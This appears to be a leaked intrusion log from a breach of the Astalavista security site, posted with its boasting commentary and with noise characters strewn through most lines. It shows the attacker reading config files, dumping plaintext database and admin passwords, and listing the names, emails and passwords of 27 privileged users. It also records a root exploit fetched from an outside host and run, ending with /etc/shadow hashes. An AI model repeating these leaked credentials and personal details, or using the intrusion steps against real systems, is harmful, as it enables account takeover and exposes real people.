3 V! H& ~& C7 w3 x2 A' g0 ttotal 2009 G! @; V. Y. E: \7 F8 n
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
8 P$ J! S! X) h: F2 b) Fdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..( o, u+ L0 q+ b1 X+ ?
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007. _% C/ P. |8 d9 k+ W
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
1 I& T" y) d# V1 }drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com8 M3 q9 m1 R. F0 U8 z/ }: L
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
2 ^) C6 j, }$ B: ^; y! R/ Xdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner: e. l& |. [" _; t# ~( @/ m
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
- R3 k, k; ^% M; g0 n/ `& E' W, gdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
0 r+ d# @2 Q1 P; F0 @* Sdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
6 u: r: `$ E, e% Adrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd# o# ?4 @/ Y9 r. [. m! v
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
4 u! M$ g7 b5 }8 r-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
( ]$ [ l% e$ {2 c. E% ~drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed( m% M5 w8 t$ _; s d' [
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour3 m2 s0 [" v, I& m" }* o
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess8 T2 X2 c0 d6 U2 ^6 n$ G3 U* L; I6 u
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
7 {, B& ^# Q! G: ?-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
+ @7 s; @2 x5 `; A-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html- c7 _2 F% U% y* R! o7 F2 T& N
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
; T; K6 V, N# J- R) P' L9 j& d$ n-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php- M! s& u6 O; M9 F
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
6 q( d6 B9 |4 F1 Y" [4 y- Qdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
% z- q3 `' W. K9 S$ k$ E- E) M' h0 ldrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang. O& i' C% }' W. j
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib1 Z6 J+ z0 R0 V$ q8 @. a
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
1 n, U! b1 c/ b8 cdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
; I* {5 ^0 L+ Pdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata1 x3 [* _$ N2 j( D$ R0 ` V
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
/ i: i3 E7 s, w: h8 y# v* m7 M-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf3 U8 j- K3 o3 I3 L" N
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re; B6 V: D! o- c! k. H V) i% i
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
6 i) G6 ~. F _7 r Jdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss' }% C1 s. R* O
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources3 o3 c' B/ Z, M3 D- s
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com8 l8 Q3 [' p: e9 ]' F7 i* @
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes+ e0 m. B$ t) @4 Y- P+ g d
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
1 l7 I. e& P6 \) ?" Gdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl0 L# X( i$ b o0 a4 v
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
" \0 l6 u# F' t6 o& K% @% |5 Qdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old/ [* f! G- N0 g6 i2 n3 e
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
0 o% h2 e% C# y/ U7 Adrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki( N4 k" |. \% K6 v- Y/ M
& m* {: p8 U* V8 c" Y/ c. osh-3.2$ head -20 index.php) x6 ~7 v+ `) z( u7 R6 w
<?PHP
, @5 r {/ r. E u! Q; B9 z/**- K" y, H3 I' x+ h) l! r
* Mainfile (external) for astalavistaNET v2.0/ \( O' x$ u7 H+ M6 ?
*/ h) m$ F. R! m1 Z& x+ v9 C( M6 a+ R
* @copyright Astalavista IT Engineering GmbH
. |0 w/ ?" H7 q. a) c: V; w( z* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
! m. I# W/ @- i+ j* @version 1.0
* ]' M" V; t( K* T; ^6 d*/
1 R6 w6 L- N8 R9 h. q3 J8 W, ]: [4 ~
8 ~( f/ i) E4 i+ l, R# S if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
4 K l3 Y9 v5 v& O( A: `; H+ ? $dontStartSession = false;, v0 ]( G. _! `4 s3 J
} else {
0 Y" B# C. d8 p2 t* m- | $dontStartSession = true;
- x, G6 M! J+ J. E' m7 O9 ^& m7 N }) l& F9 D- A9 a' R2 h: ^
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);4 W2 D" R9 {% g. {. c- P
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
" k4 y/ u) A6 f% B. e/ R require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
% m U9 t6 z ~& Y9 Z+ F) X require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
3 P8 {- _2 m. O7 E% o, N' }% p. k: q* i* `; y( k* ]
sh-3.2$ cd config& j, h4 g; x, K1 p; ?+ g' w2 ^
sh-3.2$ ls -la# G6 `$ b# c3 T7 x. Q& |
total 329 ]9 V0 X- ^2 g$ z( ^( E$ \
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
$ F; D$ J& D8 F) m. Ldrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..: q9 ?, A2 |0 k1 _4 \* Y: [
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php( z _" {: v0 N
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
4 f: b5 d) E3 j5 y-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php. M# [$ g* G" g. e/ E3 ?: h/ w
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
; F. Q' N! \* l" ]( ?-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php9 [' _) N7 I5 s0 u0 h
! o. h' u. s- T \% ^, Q; r
sh-3.2$ cat com.conf.php8 |6 z6 b" m% y# d7 f1 R
[snip]
4 Q1 k4 ]% b5 T//member-database1 U M1 E: [2 Y6 J
$_CONFIG['db_mem_server'] = ‘localhost’;/ R1 T5 e5 L, U; ]8 K. V1 @
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
! }6 d+ |# L, R k4 O4 C$_CONFIG['db_mem_user'] = ‘astanet_db’;
4 Y7 z6 h! m7 Z5 b# y, L$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
4 V' S; K$ T. k+ Y H9 _$_CONFIG['db_mem_debug'] = false; //true or false
* G' b: O8 ^0 _4 l, a) R3 Z" h//ads-database
( v( v7 C8 s1 M0 A/ z+ e$_CONFIG['db_ads_server'] = ‘localhost’;
8 ~( Q0 q" M( A" b- `6 D$_CONFIG['db_ads_database'] = ‘astanet_ads’;
" d* K: i+ L# b) r% n$_CONFIG['db_ads_user'] = ‘astanet_db’;2 z. L, r5 z1 D2 R+ p0 ^6 S
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;) d# Q, g- t( C4 L( Z. _- ^& c& @9 J
$_CONFIG['db_ads_debug'] = false; //true or false
7 G+ O2 G# E: x) c" ^5 M//rainbow-database( n+ J' q1 w+ Y9 t2 _- M
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
- ]$ i% H4 M8 V, _$_CONFIG['db_rainbow_database'] = ‘rainbow’;
9 t2 P$ \( h3 J, q$_CONFIG['db_rainbow_user'] = ‘dinu’;
7 E* J* B; `1 O$_CONFIG['db_rainbow_password'] = ‘dinudinu’;/ ?2 W# x# p r, j- i4 n" M! b
$_CONFIG['db_rainbow_debug'] = false; //true or false9 u; B2 c/ \# i( i% w$ i
//mailing lists database8 ]- ~+ T/ h; @8 L \; r, M
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;$ q* c& B |% m$ `( Y
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
4 r" d6 l- w1 F* t0 l$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;/ T9 E' X- ]. o% b1 R
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
" H" W0 v' j3 x# `, p$_CONFIG['db_mailing_lists_debug'] = false; //true or false
" W# l9 g/ z, t+ d//paypal
. `6 J! {5 Z x( q# `" F$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
- T5 [2 M v- O9 b `4 i3 k0 X$_CONFIG['sub_pp_cmd'] = ‘_xclick’;+ a/ o' M3 ] e; Q: ~$ b
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
2 i1 f N' q. r$_CONFIG['sub_pp_noship'] = ‘1′;3 v$ W k( T2 H# Y. E
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;2 Q: M4 ~8 m1 y# u5 ?
[snip]7 t' ^0 f T: o! C! H1 d, u
/ s0 u1 i& h" c: g' [sh-3.2$ cd ..3 Q1 v" M' i% E+ c
sh-3.2$ cd member& ~9 o, a; X4 ]9 K# p7 @2 i
sh-3.2$ ls -la
, P! r! f" u' U" b/ D' V' L$ Btotal 209 {% u. x' z( R; W" R3 `& _
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
* f; Z, ~7 o }$ L" A# Qdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... c f: x; B7 H% t" g
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess# b: j2 P8 j: h' Q( }+ ? D# A, _6 l
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
5 p0 C- C7 @% n, J4 m% p& Csh-3.2$ cat .htaccess
: I+ x& @4 Q; K/ H* D6 K+ t+ [SecFilterEngine off8 Z0 t. c- |+ q: W6 E
/ K. h3 H, e- Q0 ^6 ?sh-3.2$ cd ..
: [# _. s' Y/ @( l# psh-3.2$ cd cron
' d ^ V+ l0 Psh-3.2$ ls -la
0 h1 Z) `2 n: k, Rtotal 168
& I3 o" A$ g3 q3 Tdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
0 M2 b) Z# ^) C$ udrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..# L3 T$ C( R0 c
-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
$ u1 N7 k$ p) d' e1 ]1 h4 i; W-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php. ~7 d x1 A5 ?6 G7 X/ ^
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php2 h! U+ }: o; g0 m$ S# q
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php3 k/ [0 f* q [$ O
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
* C0 e) n, ?! }2 M1 a: O# h8 z! C-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php; K, X) o* e/ _, p' l3 \) n
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php) z# S! v& J4 D0 U1 x
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php; D P+ v, K$ F7 a
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh [2 t/ p/ B5 R6 P, \8 l
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php1 K& H2 e* |8 k+ U# O! t( V
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
- g% \$ G8 s( L' U; ]: O1 ]-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
+ H3 u9 I; g+ D- [: {-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh' p3 W" r$ P& f2 n" E [ Q
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php+ A K4 ^& L2 \7 V
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
+ A! M' c! Q4 I1 N* P" P-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php7 U# X* ^7 [5 f# z$ M* B
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php* Q$ v0 J. F+ i8 k: |4 C) I, T
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
' y: r: h/ @$ Bdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
4 [7 \# X4 {6 r( r+ C-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
6 `% z5 S. R" `& b-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
, e" x. g3 n% i, d- x L) M2 H
! Z" P! f0 i8 s$ }$ b q8 {sh-3.2$ cd ..
$ K0 }% I2 L+ `9 vsh-3.2$ cd _007' T/ e$ O) z8 E, @
sh-3.2$ ls -la
/ H! H% D4 w4 `total 241 C' [3 s" v. a* M! y! y
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .- j8 C4 _+ _6 p0 k/ P
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..; C" O1 ~" x! t" h/ x, X
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
" s' y a7 B8 e( b7 _-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php* A5 I8 ~) Q' R( s1 o% A
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php3 X, |0 r- J3 F# d: O$ K
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap( ~$ A- Y+ R% x- x* f% u
5 x2 r# q& l+ M- Y3 X$ ysh-3.2$ cat .htaccess
6 Q+ q- h' U* H, [$ t" SauthType Basic
; G4 L' E% R: @" }4 e+ ?authName Admin
- q: ^8 Q1 S* G7 b& y# s, jauthUserFile /home/astanet/auth/.htadm_pwd
# I1 y* q' h1 vrequire valid-user
) F9 } b+ n# Y- {6 l+ P8 u6 d* `8 e
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
: U! p+ U- i' `1 `0 Jadmin2net:CR0bl65MwhfT2 q' p/ u: t) ?4 s
$ W3 Q6 c% b/ }( \2 S/ h3 T5 psh-3.2$ mysql -u astanet_db -p4 D( w- P9 ~) N) {
Enter password:
: }3 ^' V, w1 N3 n" GWelcome to the MySQL monitor. Commands end with ; or \g.4 ~: l2 m/ y R' W9 h
Your MySQL connection id is 275153& y ?% X; a4 f2 ^4 S1 Q
Server version: 5.0.45-community-log MySQL Community Edition (GPL)7 u s$ I% `' j" n! w$ _
2 f* t( w0 t0 a$ L8 w$ [Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
, y+ q* \8 o# N$ O# C9 ^7 w6 M6 Y; Y
mysql> show databases;
! C4 m' i; r2 y+———————–+
4 W; C( u3 U( s| Database |% g) V( d4 G; A. M$ N
+———————–+1 g5 O% D: h. ]6 J1 F( M
| information_schema |
( i9 U+ g1 o. R( D$ j| astanet_ads | o: ~& g. B5 S7 Z; |
| astanet_mailing_lists |' W# L) y9 T l( y9 U, S) Y
| astanet_mediawiki |% {+ V0 D" s0 }* S1 ^0 ?: j
| astanet_membersystem |
7 L& E: t2 ~# o# O, d- I| test |
; |% p1 e" h" B& k U/ Y) V( r) r- [+———————–+
: C% R% C% S- m3 Z3 ~, h7 x6 rows in set (0.00 sec)
, E0 S- F$ U* q8 w4 l8 e% U5 a" B& }
mysql> use astanet_membersystem
V9 i9 }2 R# V5 IDatabase changed
0 f' |$ w* w$ _4 rmysql> show tables;: W" t1 ]) h* v, l8 |
+———————————–+0 ?( x5 j6 W9 E" G. h
| Tables_in_astanet_membersystem |
. e! c/ w% J. |) O* ~+———————————–++ n( M6 {/ m/ D3 Y! v( [. w8 c
| blacklist_categories |
! Z2 Q( z# t7 E9 l4 [| blacklist_content |
8 W# g) ?# x# Q& L| blacklist_levels |
7 P' e& @2 ]/ x7 P/ q3 X; f| blacklist_mcset |0 a$ Y% P8 p# ?/ R% e9 Z
| dir_categories |
+ U, }6 `, i" R' m9 _2 I1 P| dir_comments |
1 P& X; V+ \! p. c% T1 W| dir_links |
2 I* @: k8 M1 l$ f) q* d ^2 M0 }| dir_temp |' {) W/ X# }. a, S
| dir_votes |
! j+ Q$ A+ p' a, B6 k) r| documents |6 G/ Q+ h" P. c/ v" s( K( d ^
| documents_categories |
7 E8 w1 B8 M+ `| email_content |
0 d* m# Q3 a# Y2 `9 p& G: @9 F( ?| email_settings | B# |6 N% D, P/ T' e
| exploits |
+ e* a5 [" S; e9 W# T4 q" F8 k| exploits_categories |
9 w8 }$ Z" f- X- s( j; n5 c| exploittree_categories |
) M. ?2 w3 Y/ h% [( d| exploittree_exploits |
# r9 _+ k( q% y/ D| home_values |
8 N- }6 n% q3 ^8 y" u: N! B+ D| iso_countries |
7 a9 `( H( t/ r! n# g* s# r| links_categories |- X: _; X) X$ X: e% L3 T7 i( F
| links_records |8 I# @2 Q# b9 K5 k8 j
| links_unauth |
6 e+ `" L+ @# Q, W( b| links_votes |
2 \ O/ F& d, ?0 V u| log |
) I+ \ K$ p" L0 W& H| news_categories |
6 o( W3 N6 @( b6 e. n8 r2 || news_comments |
3 x1 U$ A& T7 u0 V F| news_emoticons |
- L0 p- ]( V; B9 o* c| news_latest |7 o9 H, K6 l1 A8 E2 I
| news_messages |* c% Q# L; H2 e+ ]3 \) @! k; t
| news_statistics |
7 G, w5 I/ N2 Z g9 f1 H| news_votes |$ s( ]6 h( K$ z1 M4 I0 B
| prices_content |
. b, R; }8 B5 O$ T+ j0 N- e3 l5 s! t| prices_offers |
3 u" u. U9 K: X, Z% u# ~| rss_settings |
* \% T4 v, g% F5 F* g/ e/ }5 Z| sessions |. X9 y9 u8 T# D7 L
| stats_signups |
7 G9 k: R5 f# w1 B/ ~| u2u2 |: D F0 C, T% \- q, s* U
| u2u_contact |
2 Z" I; p B7 Z$ `| u2u_settings |( Y( a5 G) @5 D8 J5 Q
| user_keywords_selected_categories |3 r% ?' B; t1 y$ V/ P* k
| users |
1 b$ Z) n4 f$ L- l' e, `, Y+ R| users_ipn_test |
0 V P p+ x! m! [| users_keyword_values |
/ W' c9 F9 T+ T( i| users_profile |
5 W* t8 E' {; e, | g! O: `| users_temp |
/ Y) {; i) d4 l- C/ ?) y9 n9 I| users_upgrade |2 F {$ _# H5 y$ |% f, J! _
+———————————–+, v. \: Y9 d9 t1 e
46 rows in set (0.00 sec)
/ K# i6 B, s+ p" j9 _/ R5 u: P1 U* x5 E8 }; [0 o4 R
mysql> describe users;
+ O2 m3 O: T W% S+————————–+————————————–+——+—–+———————+—————-+
+ Q% K! ?; L5 z4 V8 k| Field | Type | Null | Key | Default | Extra |) d# Y' o5 J6 L, L; ?; n5 e+ v
+————————–+————————————–+——+—–+———————+—————-+
8 a I' w1 p( p| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |0 [2 b, a5 d7 h8 Y! j( ^" N- J
| user | varchar(50) | NO | | | |$ z0 e# `$ R* ~1 D; |
| nickname | varchar(30) | NO | MUL | anonymous | |1 _. x" ^" N- c4 ^1 \6 f% |$ ]
| password | varchar(30) | NO | | | |
/ q+ r* B0 N! ]4 x O| userlevel | tinyint(3) | YES | MUL | NULL | |5 h- g' `9 [% m% K- a
| exp | int(8) unsigned | NO | | 0 | |& {7 K, r1 {5 @" `( m; K
| email | varchar(50) | NO | | | |, N% @$ O- a- R$ P6 F( o& v, C
| ip | varchar(15) | NO | | 0 | |
% W0 D# r* q8 n3 M; |7 U| proxy | set(’0′,’1′) | NO | | 0 | |8 T7 k8 y" n5 f
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |( b7 A$ q. U5 D \
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |0 Q- z" B( Z, Z+ ~+ w g) i
| anz_in | tinyint(1) | NO | | -1 | |
( U( L* p. v/ t# t4 T! \| status | tinyint(1) unsigned | NO | | 0 | |
5 e2 a" M( g8 S l4 P| checked | set(’0′,’1′,’2′) | NO | | 0 | |7 q5 ]5 G! }! n4 }, F
| freemember | set(’0′,’1′) | NO | | 0 | |
: \2 n) M7 F5 {) m| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |, T+ x6 k+ X l& o P
| lang | tinytext | NO | | | |6 w* W& V2 X n
| adid | smallint(6) | NO | | 0 | |! @* r/ q& l7 ^. M
| pp_txn_id | varchar(255) | YES | | NULL | |
$ f% i+ G$ @' A. D0 _6 S/ N5 T' `| cnb_transaction_id | varchar(255) | YES | | NULL | |7 j" e/ J5 t* L0 v
| cnb_order_id | varchar(255) | YES | | NULL | |! x' O+ w8 @5 x( X
| cnb_user_id | int(11) | YES | | 0 | |# u' T+ d! I+ X) k5 n* E, V, j; u, @
+————————–+————————————–+——+—–+———————+—————-+! Z2 J+ h& f8 r# S% l% y# S
22 rows in set (0.01 sec)( _4 l; p; S. [/ m, J0 E) x3 d+ s
- p" u0 s$ L- f" xmysql> select count(*) as skids from users;
/ R8 |" z E' U W/ [+——-+
+ E/ p z2 L' _; Z. {| skids |
& n9 S: H9 d! f$ |+——-+2 k1 G2 J6 H/ P2 Q$ _" w
| 25199 |
5 `+ O8 a3 L+ |6 m0 D4 C+——-+
2 X* O' O' y/ s. x' N1 row in set (0.00 sec)- k& b. I d6 f. S
) s: X/ o! c$ a* o) gmysql> select user,nickname,password,email from users where userlevel = 1;! T' c- J6 |; E
+————————–+———————-+——————+———————————–++ }/ B; s0 B1 A5 ?8 Q" N
| user | nickname | password | email |
6 D& l1 \0 n- Y4 i; q, a1 h1 b, Q9 k+————————–+———————-+——————+———————————–+
5 P# @+ c" q' F# K# }+ `& }5 Z+ _| pascal | prozac | astaman3 | 链接标记info@astalavista.net |5 L" i$ m+ G) Z( j- t! x" L
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
) w1 H( N$ y6 j% C$ a| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |, [+ r1 M" c9 k$ ^. a
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
# K5 ?5 B$ i( \, K/ s| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
. L! }, B4 i6 {3 K0 y. Z| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |; B5 s' \ H" b: K! F' D
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
- x/ x T$ q s3 p| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
9 s0 k; y# v% ]; M! Z8 ~! O| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
5 N! h/ T9 U5 I9 {3 f3 I| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
9 K5 f; k( R6 a8 K| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
& c9 A& h% ?; a% w6 e* n| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |2 }% b* M$ o0 s/ g; t: v9 Y
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
! n" U; V) r+ }| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |" V7 u( ^* r2 W/ U+ K
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
. x+ T8 W/ V9 N' v8 N: r$ e3 {| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
6 K/ v% R! q) y) k; j2 p| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
5 G2 h4 ~% v& x1 H: R8 L| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
) ^9 b) W2 U$ `" a ~| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |* e7 h8 |( _6 V7 f5 O2 E5 l# a
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |2 \) Q. B5 _" s/ ] E* b7 D" L
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |3 N, I. b. K# p: H7 L- f
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
- k, J5 q' e l" N3 E8 s0 b! U2 y0 I$ G| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
! }. Q0 r0 a7 a4 a+ A& U/ {- X| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
* |+ d' H' O; a4 B8 L: y7 c4 y| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |$ ]/ J8 t) ~- d( M' c. O; z+ ~
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
X5 N* T7 l y9 V| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
* D% n$ S4 R3 `8 e+ k) s2 [+————————–+———————-+——————+———————————–+
% ]- q& n. M9 L# {" g5 p" Q27 rows in set (0.00 sec)
2 e2 f* s; m# H# ^3 d! i& T! p3 A1 W' r; P
mysql> exit;
9 q4 ~% s8 W# b$ V5 qBye
% M& p% {( [# a2 J6 p. d' \6 j0 [5 N9 s- A; j6 W
[~] plaintext passwords? yes,
+ k0 n% b( G4 c& r3 }. ]& SThose so called “security professionals” who charge you $6.66 / month to
( B/ X6 u% u2 f! o& T6 ^register at their hack-proof portal, save your passwords in plaintext…
' Z0 O/ A# h& C" ]brilliant! w& c* x* @/ L: \2 W( j
( Q7 U6 _4 \( I) [8 H) r) T* e: F[~] This been fun but we want more.1 ^0 V. I. ^+ M1 n- P }# B$ }
1 @4 n) E5 [. z+ K! P
sh-3.2$ uname -a! I- x) M4 B! L+ {
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
" ~6 P) X3 X7 R9 msh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url], U# y" p, K2 n! H% D; O! x
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
: y6 c# i7 O) V( u; E, zResolving anti.sec.labs… 13.33.33.37 [; h7 Y2 d1 P
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
, y# ~5 @) y! L0 CHTTP request sent, awaiting response… 200 OK d: F* ]) F( g9 r4 ?7 ^+ J
Length: 18200 (18K) [text/plain]7 e9 Q/ k1 @& D( j8 v5 O
Saving to: `g0troot’
) n$ N" O) e5 K! _' x+ c
& H0 v, E2 E2 M1 c% o100%[=========================================================================================================================================>] 18,200 58.6K/s in8 \% v+ M6 {& A$ o
0.3s) X& ]0 k: T9 m
# {( x4 }/ l) J7 e3 K2 M1 c18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
( j7 {' {- k" I- p( [8 l/ [9 I' p8 j6 e$ Y
sh-3.2$ ./g0troot -i x86_64
. W, R( h1 S9 d& ^% K z [[+] g0troot - anti.sec.labs
* Y# i( _3 T7 N+ w[+] Target: 2.6.18-128.1.10.el5
. L- g- L) q- e8 [9 O( l* Y" K0 a[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
# t4 A6 u: s+ j" D* F; W& z% U* Q3 L. j" S. X. Y, t
[+] r00tr00t
: @4 a; t. h/ M8 i4 U5 b3 x" v! M4 c[~] Executing shell…! M0 W/ b! J4 n1 W! K4 |
: R% b+ t+ o( Vsh-3.2# id
: e" j4 W$ n2 d& O1 p' G5 L, Muid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)* _0 c+ a9 t& w* \/ L$ s% ^/ Y" v
- l4 L( F; O7 o3 G5 }
sh-3.2# cat /etc/shadow6 S. ~* L. f2 K% B; R1 Y
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
# o4 ]' R2 T) F7 C8 {1 W2 k[snip]0 o" q4 u t& ~9 U% w3 x
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
